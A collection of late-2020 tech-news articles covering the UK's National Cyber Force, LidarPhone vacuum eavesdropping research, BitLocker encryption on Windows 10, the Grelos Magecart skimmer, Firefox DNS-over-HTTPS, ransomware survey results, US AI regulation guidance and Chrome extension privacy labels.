Information Technology

A new offensive force made up of spies, cyber experts and the members of the military is already conducting cyber operations to disrupt hostile state activities, terrorists and criminals, the UK government has revealed.
The new group – known as the National Cyber Force – aims to tackle threats to the UK’s national security such as countering terror plots, as well as supporting UK military operations.
Prime Minister Boris Johnson told parliament that the new force was already up and running: “I can announce that we have established a National Cyber Force, combining our intelligence agencies and service personnel, which is already operating in cyberspace against terrorism, organised crime and hostile state activity,” he said.
SEE: What is cyberwar? Everything you need to know about the frightening future of digital conflict
The National Cyber Force draws together experts from intelligence agency GCHQ, the Ministry of Defence, the Defence Science and Technology Laboratory, and the Secret Intelligence Service – MI6 – which will provide its “expertise in recruiting and running agents alongside its unique ability to deliver clandestine operational technology”.
GCHQ said that examples of cyber operations could include interfering with a mobile phone to prevent a terrorist from being able to communicate with their contacts, helping to prevent the internet from being used as a platform for serious crimes, or keeping UK military aircraft safe from targeting by hostile weapons systems.
The NCF is separate to the NCSC, another part of GCHQ which works on UK cyber security.

Director GCHQ Jeremy Fleming said the National Cyber Force “brings together intelligence and defence capabilities to transform the UK’s ability to contest adversaries in cyber space, to protect the country, its people and our way of life.”
GCHQ said the new force builds on the UK’s current National Offensive Cyber Programme, including collaboration between GCHQ and the military to carry out cyber operations. The National Cyber Force has actually been floated a few times by the government already this year; back in 2018 it was reported that the new unit would be 2,000 strong and would have a budget of £250 million.
There has already been at least some use of cyber attacks or ‘offensive cyber operations’ by the UK: in 2016 the government said it had conducted cyber operations against Daesh and in 2018, it was also revealed the UK had used cyber attacks against ISIS propaganda networks. The UK has also offered its cyber capabilities to NATO.
The news about the National Cyber Force was part of a broader announcement of a defence review aimed at increasing the use of technology by the armed forces, creating a “single network” to overcome the enemy, the Prime Minister said.
“A soldier in hostile territory will be alerted to a distant ambush by sensors on satellites or drones, instantly transmitting a warning,using Artificial Intelligence to devise the optimal response, and offering an array of options, from summoning an air strike to ordering a swarm attack, by drones or paralysing the enemy with cyber weapons,” Johnson said.
Such an emphasis on cyber operations is not without their critics however. As there are no clear rules about what is an appropriate response to a cyber attack, there are concerns that the increased use of offensive cyberwarfare capabilities could lead to rapid and hard-to-control escalation in times of conflict, because different nations may be playing by different rules.
And while some argue that advertising cyber capabilities can act as a deterrent to potential attackers, not all are convinced. In a recent speech Ciaran Martin, until recently the chief of NCSC said: “In all my operational experience, I saw absolutely nothing to suggest that the existence of Western cyber capabilities, or our willingness to use them, deters attackers.” He has argued for a debate about the 
“We risk an acceptance that the acquisition and use of higher end cyber capabilities are a priority, without testing the question about what this means for our own digital environment. We haven’t had this fundamental debate because the national security community and the technological communities are not really talking to each other,” he said.  More

A team of academics has detailed this week novel research that converted a smart vacuum cleaner into a microphone capable of recording nearby conversations.
Named LidarPhone, the technique works by taking the vacuum’s built-in LiDAR laser-based navigational component and converting it into a laser microphone.

Laser microphones are well-known surveillance tools that were used during the Cold War to record conversations from afar. Intelligence agents pointed lasers at far-away windows to monitor how glass vibrated and decoded the vibrations to decipher conversations taking place inside rooms.
Academics from the University of Maryland and the National University of Singapore took this same simple concept but applied it to a Xiaomi Roborock vacuum cleaning robot.
Certain conditions need to be met
A LidarPhone attack is not straightforward, and certain conditions need to be met. For starters, an attacker would need to use malware or a tainted update process to modify the vacuum’s firmware in order to take control of the LiDAR component.
This is needed because vacuum LiDARs work by rotating at all times, a process that reduces the number of data points an attacker can collect.
Through tainted firmware, attackers would need to stop the vacuum LiDAR from rotating and instead have it focus on one nearby object at a time, from where it could record how its surface vibrates to sound waves.

In addition, because smart vacuum LiDAR components are nowhere near as accurate as surveillance-grade laser microphones, the researchers also said the collected laser readings would need to be uploaded to the attacker’s remote server for further processing in order to boost the signal and get the sound quality to a state where it can be understood by a human observer.
Nonetheless, despite all these conditions, researchers said they were successful in recording and obtaining audio data from the test Xiaomi robot’s LiDAR navigational component.
They tested the LidarPhone attack with various objects, by varying the distance between the robot and the object, and the distance between the sound origin and the object.

Tests focused on recovering numerical values, which the research team said they managed to recover with a 90% accuracy.
But academics said the technique could also be used to identify speakers based on gender or even determine their political orientation from the music played during news shows, captured by the vacuum’s LiDAR.
No need to panic. Just academic research.
But while the LidarPhone attack sounds like a gross invasion of privacy, users need not panic for the time being. This type of attack revolves around many prerequisites that most attacks won’t bother. There are far easier ways of spying on users than overwriting a vacuum’s firmware to control its laser navigation system, such as tricking the user on installing malware on their phone.
The LidarPhone attack is merely novel academic research that can be used to bolster the security and design of future smart vacuum robots.
In fact, the research team’s main recommended countermeasure for smart vacuum cleaning robot makers is to shut down the LiDAR component if it’s not rotating.
Additional details about the research are available in a research paper titled “Spying with Your Robot Vacuum Cleaner: Eavesdropping via Lidar Sensors.”
The paper is available for viewing in a PDF format here and here, and was presented at the ACM Conference on Embedded Networked Sensor Systems (SenSys 2020), yesterday, on November 18, 2020. A recording of the research team’s talk is available below:
[embedded content] More

First in a series of hands-on guides.

Windows 10

If your PC were lost or stolen, you’d probably cringe at the cost of replacing it. But that’s nothing compared to what you’d stand to lose if someone had unfettered access to the data on that device. Even if they can’t sign in using your Windows user account, a thief could boot from a removable device and browse the contents of the system drive with impunity.
The most effective way to stop that nightmare scenario is to encrypt the entire device so that its contents are only available to you or someone with the recovery key.
Also: Here’s how you can still get a free Windows 10 upgrade
All editions of Windows 10 since version 1511 (released in November 2015) include XTS-AES 128-bit device encryption options that are robust enough to protect against even the most determined attacks. Using management tools, you can increase the encryption strength to XTS-AES 256.
On modern devices, the encryption code also performs pre-boot system integrity checks that detect attempts to bypass the boot loader.
BitLocker is the brand name that Microsoft uses for the encryption tools available in business editions of Windows (desktop and server). A limited but still effective subset of BitLocker device encryption features are also available in Windows 10 Home editions. Here’s how to make sure your data is protected.
How does BitLocker work in Windows 10?
On all devices that are designed for Windows 10 (see the following section for the hardware requirements), device encryption is automatically enabled. Windows Setup automatically creates the necessary partitions and initializes encryption on the operating system drive with a clear key. To complete the encryption process, you must perform one of the following steps:
Sign in using a Microsoft account that has administrator rights on the device. That action removes the clear key, uploads a recovery key to the user’s OneDrive account, and encrypts the data on the system drive. Note that this process happens automatically and works on any Windows 10 edition.
Sign in using an Active Directory account on a Windows domain or an Azure Active Directory account. Either configuration requires a business edition of Windows 10 (Pro, Enterprise, or Education), and the recovery key is saved in a location that is available to the domain or AAD administrator.
If you sign in using a local account on a device running a business edition of Windows 10, you need to use the BitLocker Management tools to enable encryption on available drives.

On self-encrypting solid-state drives that support hardware encryption, Windows 10 will offload the work of encrypting and decrypting data to the hardware. Note that a vulnerability in this feature, first disclosed in November 2018, could expose data under certain circumstances. In those cases, you’ll need a firmware upgrade for the SSD; until that upgrade is available, you can switch to software encryption using the instructions in this Microsoft Security Advisory: Guidance for configuring BitLocker to enforce software encryption.
Note that Windows 10 still supports the much older Encrypted File System feature. This is a file- and folder-based encryption system that was introduced with Windows 2000. For virtually all modern hardware, BitLocker is a superior choice.
Also: Best encryption software for business in 2020: BitLocker, FileVault, Guardium, and more 
Hardware requirements
The most important hardware feature required to support BitLocker Device Encryption is a Trusted Platform Module chip, or TPM. The device also needs to support the Modern Standby feature (formerly known as InstantGo).
Virtually all devices that were originally manufactured for Windows 10 meet these requirements.
Managing BitLocker
For the most part, BitLocker is a set-it-and-forget-it feature. After you enable encryption for a drive, it doesn’t require any maintenance. You can, however, use tools built into the operating system to perform a variety of management tasks.
The simplest tools are available in the Windows graphical interface, but only if you are running Windows 10 Pro or Enterprise. Open File Explorer, right-click any drive icon, and click Manage BitLocker. That takes you to a page where you can turn BitLocker on or off; if BitLocker is already enabled for the system drive, you can suspend encryption temporarily or back up your recovery key from here. You can also manage encryption on removable drives and on secondary internal drives.

These management tools are available only on Windows 10 business editions.
On a system running Windows 10 Home, you’ll find an on-ff button under Settings > Update & Recovery > Device Encryption. A warning message will appear if device encryption hasn’t been enabled by signing into a Microsoft account.
Also: How to get a free Windows (or Linux) recovery image for your OEM PC
For a much larger set of tools, open a command prompt and use one of the two built-in BitLocker administrative tools, manage-bde or repair-bde, with one of its available switches. The simplest and most useful of these is manage-bde -status, which displays the encryption status of all available drives. Note that this command works on all editions, including Windows 10 Home.
For a full list of switches, type manage-bde -? or repair-bde -?
Finally, Windows PowerShell includes a full set of BitLocker cmdlets. Use Get-BitLockerVolume, for example, to see the status of all fixed and removable drives on the current system. A full listing of available BitLocker cmdlets, see the PowerShell BitLocker documentation page.
Saving and using a recovery key
Under normal circumstances, you unlock your drive automatically when you sign in to Windows 10 using an account that’s authorized for that device. If you try to access the system in any other way, such as by booting from a Windows 10 Setup drive or a Linux-based USB boot drive, you’ll be prompted for a recovery key to access the current drive. You might also see a prompt for a recovery key if a firmware update has changed the system in a way that the TPM doesn’t recognize.
As a system administrator in an organization, you can use a recovery key (manually or with the assistance of management software) to access data on any device that is owned by your organization, even if the user is no longer a part of the organization.
Also: The Windows 10 update guide: How to install and manage security and feature updates
The recovery key is a 48-digit number that unlocks the encrypted drive in those circumstances. Without that key, the data on the drive remains encrypted. If your goal is to reinstall Windows in preparation for recycling a device, you can skip entering the key and the old data will be completely unreadable after setup is complete.
Your recovery key is stored in the cloud automatically if you enabled device encryption with a Microsoft account. To find the key, go to https://onedrive.com/recoverykey and sign in with the associated Microsoft account. (Note that this option works on a mobile phone.) Expand the listing for any device to see additional details and an option to delete the saved key.

Expand any listing to see more details, including the date the key was created and a Delete option.
If you enabled BitLocker encryption by joining your Windows 10 device with an Azure AD account, you’ll find the recovery key listed under your Azure AD profile. Go to Settings > Accounts > Your Info and click Manage My Account. If you’re using a device that’s not registered with Azure AD, go to https://account.activedirectory.windowsazure.com/profile and sign in with your Azure AD credentials.
Find the device name under the Devices & Activity heading and click Get BitLocker Keys to view the recovery key for that device. Note that your organization must allow this feature for the information to be available to you.
Finally, on business editions of Windows 10, you can print or save a copy of the recovery key and store the file or printout (or both) in a safe place. Use the management tools available in File Explorer to access these options. Use this option if you enabled device encryption with a Microsoft account and you prefer not to have the recovery key available in OneDrive
BitLocker To Go
Removable storage devices need encryption too. That includes USB flash drives as well as MicroSD cards that can be used in some PCs. That’s where BitLocker To Go works.
To turn on BitLocker encryption for a removable drive, you must be running a business edition of Windows 10. You can unlock that device on a device running any edition, including Windows 10 Home.
As part of the encryption process, you need to set a password that will be used to unlock the drive. You also need to save the recovery key for the drive. (It’s not automatically saved to a cloud account.)
Also: Windows 10: A cheat sheet TechRepublic
Finally, you need to choose an encryption mode. Use the New Encryption Mode (XTS-AES) option if you plan to use the device exclusively on Windows 10. Choose Compatible Mode for a drive you might want to open on a device running an earlier version of Windows.
The next time you insert that device into a Windows PC, you’ll be prompted for the password. Click More Options and select the checkbox to automatically unlock the device if you want easy access to its data on a trusted device that you control.

Use the Automatically Unlock option to skip the password when using a removable drive on a trusted device.
That option is especially useful if you’re using a MicroSD card for expanded storage capacity on a device such as a Surface Pro. After you sign in, all of your data is immediately available. If you lose the removable drive or it is stolen, its data is inaccessible to the thief. More

A new variant of a skimmer has revealed the increasingly muddy waters associated with tracking groups involved in Magecart-style attacks. 

On Wednesday, researchers from RiskIQ described how a new Grelos skimmer has shown there is “increased overlaps” in Magecart infrastructure and groups, with this malware — alongside other forms of skimmer — now being hosted on domain infrastructure used by multiple groups, or connected via WHOIS records, known phishing campaigns, and the deployment of other malware, creating crossovers that can be difficult to separate. 
See also: Magecart group uses homoglyph attacks to fool you into visiting malicious websites
Magecart is an umbrella term used to describe information stealing campaigns and threat actors that specialize in the theft of payment card data from e-commerce websites. 
Several years ago, well-known brands including British Airways and Ticketmaster became the first major victims of this form of attack, and since then, countless websites have fallen prey to the same technique. 
The new variant of the Grelos skimmer, malware that has been around since at least 2015 and associated with Magecart groups 1 and 2, is similar to a separate strain described by researcher @AffableKraut in July. This variant is a WebSocket-based skimmer that uses base64 obfuscation to hide its activities. 
“We believe this skimmer is not directly related to Group 1-2’s activity from 2015-16, but instead a rehash of some of their code,” RiskIQ says. “This version of the skimmer features a loader stage and a skimmer stage, both of which are base64 encoded five times over.”

CNET: Trump fires top cybersecurity official for debunking election fraud claims
Following a Magecart attack on Boom! Mobile, RiskIQ examined links established by Malwarebytes and this attack, in which the Fullz House group loaded malicious JavaScript on the mobile network provider to scrape customer data.
The domains used in this cyberattack led the team to a cookie and associated skimmer websites, including facebookapimanager[.]com and googleapimanager[.]com.
However, instead of finding the Fullz House skimmer, the researchers uncovered a new Grelos skimmer variant. This strain has a similar base64 encoded loader stage, but only features one layer of encoding, duplicate script tags, spelling mistakes, and includes a dictionary called “translate” which contains phrases used by fake payment forms created by the malware. Web sockets are still used for data exfiltration. 
TechRepublic: Webex security flaw allows people to secretly sneak into meetings as “ghosts”
RiskIQ has observed new variants of Magecart-related skimmers reusing code over the past few years. The company says that the Fullz House skimmer has been co-opted by other hacking groups, even leveraging some of the same infrastructure — such as hosting providers — to host other skimmers, including Grelos, which also shares IPs with the Inter skimmer. 
This, in turn, is creating a “murkiness” when it comes to tracking the activities of separate Magecart groups, many of which are actively launching new attacks against e-commerce companies on a daily basis. 
Previous and related coverage
Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Mozilla has opened today a public comment and consultation period about the ways it could enable support for the controversial privacy-centric DNS-over-HTTPS (DoH) protocol inside Firefox.

The browser maker’s decision to open a rare public consultation period comes after the organization faced criticism last year in the UK for its plans to support DoH inside Firefox.
UK government officials, law enforcement agencies, and local internet service providers criticized Mozilla for developing and wanting to roll out DoH, a feature they said could have helped suspects bypass enterprise firewalls and parental controls blocklists — even earning the browser maker a nomination for an “Internet Villain” award from a local ISP.
All last year’s hoopla was caused by DoH, a web protocol developed as an alternative to the classic DNS (Domain Name System).
DoH works by encrypting DNS queries (which are normally sent out in clear text) and hiding them inside normal-looking HTTPS web traffic.
When deployed inside browsers like Firefox, the protocol allows users to hide the sites they are accessing from third-party observers like internet service providers and enterprise traffic management solutions.
Albeit the protocol has many benefits for users’ individual privacy, ISPs and law enforcement agencies spoke out against it, with the loudest and most concerted voices coming from the UK. Some criticism came from US authorities, but this wasn’t on the same level as the one in the UK, and many US ISPs eventually set up DoH servers of their own.

Nonetheless, the pressure put on Mozilla in the UK bore its fruits and the browser maker eventually backtracked and agreed to delay deploying DoH inside the UK.
Instead, Mozilla enabled DoH for all Firefox users in the US, where the browser maker has been testing the feature at scale since February this year.
However, Mozilla has always planned to roll out DoH to all of its users across the world.
The current consultation period is here as a way to give “stakeholders” (to be read as governments and ISPs) a say in the matter and avoid future issues with the DoH rollout.
Stakeholders have from November 19, 2020, to January 4, 2021, to file their opinions, which Mozilla said it plans to take into consideration as long as they’re reasonable and have the interests of its users in mind.
However, not many things are expected to change. Since the “Internet Villain” scandal last year, Mozilla has already addressed most of the DoH criticism already. This included:
Adding a “canary” domain that can be queried on managed networks to force Firefox to disable DoH support and defer to local enterprise policies for DNS management.
Adding support for additional default DoH providers inside Firefox, besides Cloudflare (the only DoH provider last year).
Adding an easier section in the Firefox options page to manage DoH settings.
But regardless of these updates to how DoH now works inside Firefox, Mozilla still wants to hear from companies and governments about issues with DoH before it enables the feature for all users next year.
Apple, Chrome, and Microsoft have also announced plans to support the DoH protocol in their products, and all have learned from the criticism that Mozilla had to deal with last year, all deploying enterprise-friendly DoH implementations from the get-go, with Google’s DoH support going live for all Chrome users earlier this year. More

A new survey has revealed Australian organisations that operate multi-cloud infrastructures run a greater risk of being exposed to a ransomware attack and are more likely to pay hackers to retrieve their data in the event of one.
Veritas revealed in its Australian report of its 2020 Global Ransomware Resiliency Report [PDF] that only 43% of the Australian respondents said their security has kept pace with the growing complexity of their IT environment.
According to the report, some 57% of Australian organisations run a multi-cloud environment and use between 15-20 cloud services. It indicated that 33% of organisations with more than 20 clouds paid a ransom in full, compared to the 19% of businesses with fewer than five clouds that did the same.
At the same time, the average number of clouds deployed by organisations who partly paid a ransom was 11.47, versus 6.17 for businesses who did not pay at all.
The survey — which was conducted in September 2020 and includes responses from 150 Australians senior IT executives from companies of 1,000 employees or more – also showed that a business with complex cloud architectures was likely to hinder how quickly they recover from a ransomware attack.
While 41% of those businesses with fewer than five cloud providers in their infrastructure saw their operations disrupted by less than one day, 67% with over 20 clouds took five to 10 days to get back on track.
Read also: Why ransomware has become such a huge problem for businesses (TechRepublic)

“We’re seeing a lag between the rapid expansion of the threat surface that comes with increased multi-cloud adoption, and the deployment of data protection solutions needed to secure them,” Veritas Technologies managing director Howard Fyffe said.
“Our research shows that Essential Eight compliance is critical. Fortunately, some businesses are investing to close that resiliency gap — but unless this is done at greater speed companies will remain vulnerable.”
On the point of investment, over half of Australian businesses shared that they had increased their security budget due to the COVID-19 pandemic, with Veritas noting that those that did boost their security investment were able to restore their data faster.
For instance, the company pointed to how 53% of Australian IT executives said they had spent more on security since the pandemic and were able to restore 90% or more of their data, compared with just 43% of those spending less. 
Nonetheless, the results suggest that there is more to be done though, with the average business being able to restore only 82% of its data, Veritas said.
When it came to examining what data protection tools were implemented, the top ones were installing security and behavioural analytical tools, anti-virus software and endpoint security, and backup up data.
Despite Australian organisations continuing to be at risk of ransomware attacks when this is compared on a global basis, they are still better off. Australian organisations had been hit by 1.14 ransomware attacks, which is below the global average of 1.87.
Need to disclose a breach? Read this: Notifiable Data Breaches scheme: Getting ready to disclose a data breach in Australia  
Related Coverage  More

US federal agencies have now been issued a guidance by the White House on how to regulate artificial intelligence (AI) applications that are produced in the US.
“This memorandum sets out policy considerations that should guide, to the extent permitted by law, regulatory and non-regulatory approaches to AI applications developed and deployed outside of the federal government,” stated Russell Vought, director of the Office of Management and Budget (OMB) in the memo [PDF] for all the heads of executive departments and agencies, including independent regulatory agencies.
The OMB guidance comes 21 months after President Donald Trump signed an executive order to fast-track the development and regulation of AI in the US.
President Trump at the time touted the executive order would see the launch of the American AI initiative, which would place US resources towards ensuring that AI technology is made locally.
According to the guidance, the idea is to ensure that agencies do not introduce regulations and rules that “hamper AI innovation and growth”.
“Where permitted by law, when deciding whether and how to regulate in an area that may affect AI applications, agencies should assess the effect of the potential regulation on Al innovation and growth,” it said.
“While narrowly tailored and evidence-based regulations that address specific and identifiable risks could provide an enabling environment for US companies to maintain global competitiveness, agencies must avoid a precautionary approach that holds AI systems to an impossibly high standard such that society cannot enjoy their benefits and that could undermine America’s position as the global leader in AI innovation.”

Read also: How to govern AI in your organization: 6 tips (TechRepublic)
The guidance advises agencies to address inconsistent, burdensome, or duplicative state laws that could be hurting the national AI market. 
“Where a uniform national standard for a specific aspect of AI is not essential, however, agencies should consider forgoing regulatory action,” it said.
OMB listed 10 stewardship principles that federal agencies could use for AI applications. These were initially introduced as part of the draft memorandum released at the start of the year.
These principles include creating public trust in AI by reducing accidents or by protecting the privacy of individual AI users; encourage public participation in how AI applied; deliver scientific integrity and information quality; apply consistent risk assessment and management across various agencies and technologies; maximise benefits and consider costs of employing AI; pursue flexible approaches to AI so it would not harm innovation; ensure the technology is fair and non-discriminate; ensure there is transparency when it comes to disclosures; promote the development of AI systems that are safe, secure, and operate in the way it is intended; and ensure agencies share experiences to their approach to AI.
At the same time, OMB also provided examples of how agencies could take non-regulatory approaches to address potential AI risks, such as setting sector-specific policy guidance or frameworks, delivering pilot programs and experiments, or introducing voluntary consensus standards or frameworks.
In order to ensure agency plans are consistent with the guidance, agencies are required to submit their compliance plans to the Office of Information and Regulatory Affairs by 17 May 2021, where they must identify their regulatory authorities, as well as AI-related information that is collected from entities they regulate.
“The agency plan must also report on the outcomes of stakeholder engagements that identify existing regulatory barriers to AI applications and high-priority AI applications that are within an agency’s regulatory authorities. OMB also requests agencies to list and describe any planned or considered regulatory actions on AI,” the memo said.
Earlier this week, the HR 1688 Internet of Things Cybersecurity Improvement Act of 2020 was unanimously passed in Senate, just over a year since it was introduced in the House.
See also: What is the IoT? Everything you need to know about the Internet of Things right now
Under the Bill [PDF], the National Institute of Standards and Technology will be required to develop and publish guidelines for the federal government to only buy and use Internet of Things (IoT) devices that have met the new security rules, including adhering to minimum information security requirements for managing potential cyber risks associated with IoT devices.
The Bill noted some of the minimum considerations that should be covered in the guidelines include the secure development of IoT devices, identity management, patching, and configuration management.
When these guidelines are developed, the OMB will be responsible for issuing them to each agency, as well as provide details on how each agency should report and publish information around security vulnerabilities, how to resolve them, and coordinate with other agencies.  
With the Bill now passed through US Congress, it will be handed over the president to see it signed. If it is, it will mark the first national approach to IoT security in the US. California approved its own version of the IoT security Bill back in 2018. 
Related Coverage More

Image: Google
Google said today it plans to add a new section on the Chrome Web Store where extension developers will be able to disclose what user data they’re collecting from users and what they plan to do with the information.
The new section is set to go into effect on January 18, 2021, and will appear as a “Privacy practices” button on each extension’s Web Store listing.
To aid the process, Google has added a new section today in the Web Store dashboard where extension developers will be able to disclose what data they collect from their users and for what purposes.

Image: Google
Google’s new “data usage” dashboard will ship with a limited set of preset options, which will effectively prohibit Chrome developers from certain data practices, such as:
The bulk sale of user data by ensuring the use or transfer of user data is for the primary benefit of the user and in accordance with the stated purpose of the extension.
The use or transfer of user data for personalized advertising.
The use or transfer of user data for creditworthiness or any form of lending qualification and to data brokers or other information resellers. 
Google’s new “data disclosure” policy is not unique. At the WWDC 2020 developer conference in June this year, Apple announced that all App Store app listings will soon be required to include a “privacy prompt (label)” that will list all the data points apps collect from users and which data points are used to track users across apps.
Apple’s privacy labels are scheduled to go live on December 8, next month.
Google said it plans to show notices to all developers in the Web Store developer dashboards and prompt extension makers to set up a “privacy practices” section. More